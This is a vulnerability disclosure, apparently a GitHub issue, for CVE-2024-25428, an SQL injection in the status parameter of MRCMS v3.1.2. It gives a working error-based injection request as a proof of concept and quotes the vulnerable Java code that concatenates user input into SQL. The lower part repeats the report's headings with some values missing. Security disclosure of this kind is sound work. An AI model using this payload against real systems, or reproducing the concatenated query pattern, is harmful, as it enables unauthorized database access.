Open xia0chensec opened 8 months ago
[The name of an affected Product]
MRCMS
[The affected or fixed version]
v3.1.2
[CVE ID] CVE-2024-25428
[Vulnerability Type]
SQL Injection
[Vulnerability Description]
MRCMS v3.1.2 is vulnerable to SQL Injection via the status parameter
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1¤tPageNo=1&pageSize=20
1.Select content->File management
2.Click the search button
SQL injection exists in status parameter
status
POC
GET /admin/article.do?cid=1&did=0&status=1+and+extractvalue(1,concat(0x7e,(select+user()),0x7e))&keyword=1123¤tPageNo=1&pageSize=20 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost:8080/admin/index.do Cookie: JSESSIONID=AD318CA555923823E93DC03659C2B5C0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java
MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java
public Page find(int currentPageNo, int pageSize, Map<String,Object> condition) { String keyword = (String) condition.get("keyword"); String status = (String) condition.get("status"); int cid = (Integer)condition.get("cid"); int did = (Integer)condition.get("did"); int userGroupId = (Integer)condition.get("userGroupId"); // try { // keyword = new String(keyword.getBytes("ISO-8859-1"),"utf-8"); // } catch (UnsupportedEncodingException e) { // e.printStackTrace(); // } String prefix = config.getPrefix(); String sql = "select a.id,a.title, a.author,a.views,a.status, a.time, concat('/cms?type=article','&id=',CAST(a.id as char),'&time=',DATE_FORMAT(a.time,'%Y%m%d')) url, c.name as cname ,'article' model, a.stick from "+config.getPrefix()+"article as a " + "left join "+prefix+"channel c on c.id = a.cid "; sql += "where a.status in ("+status+") "; if(userGroupId != 1){ sql += " and a.cid in (select cid from "+prefix+"user_group_channel where gid = "+userGroupId+") "; }
In this code, the SQL query string is built through string concatenation, and there is a potential SQL injection risk at the status parameter
[The name of an affected Product]
[The affected or fixed version]
[CVE ID] CVE-2024-25428
[Vulnerability Type]
[Vulnerability Description]
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1¤tPageNo=1&pageSize=20
1.Select content->File management
2.Click the search button
SQL injection exists in
status
parameterPOC
code discovery
Code path:
MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java
In this code, the SQL query string is built through string concatenation, and there is a potential SQL injection risk at the
status
parameter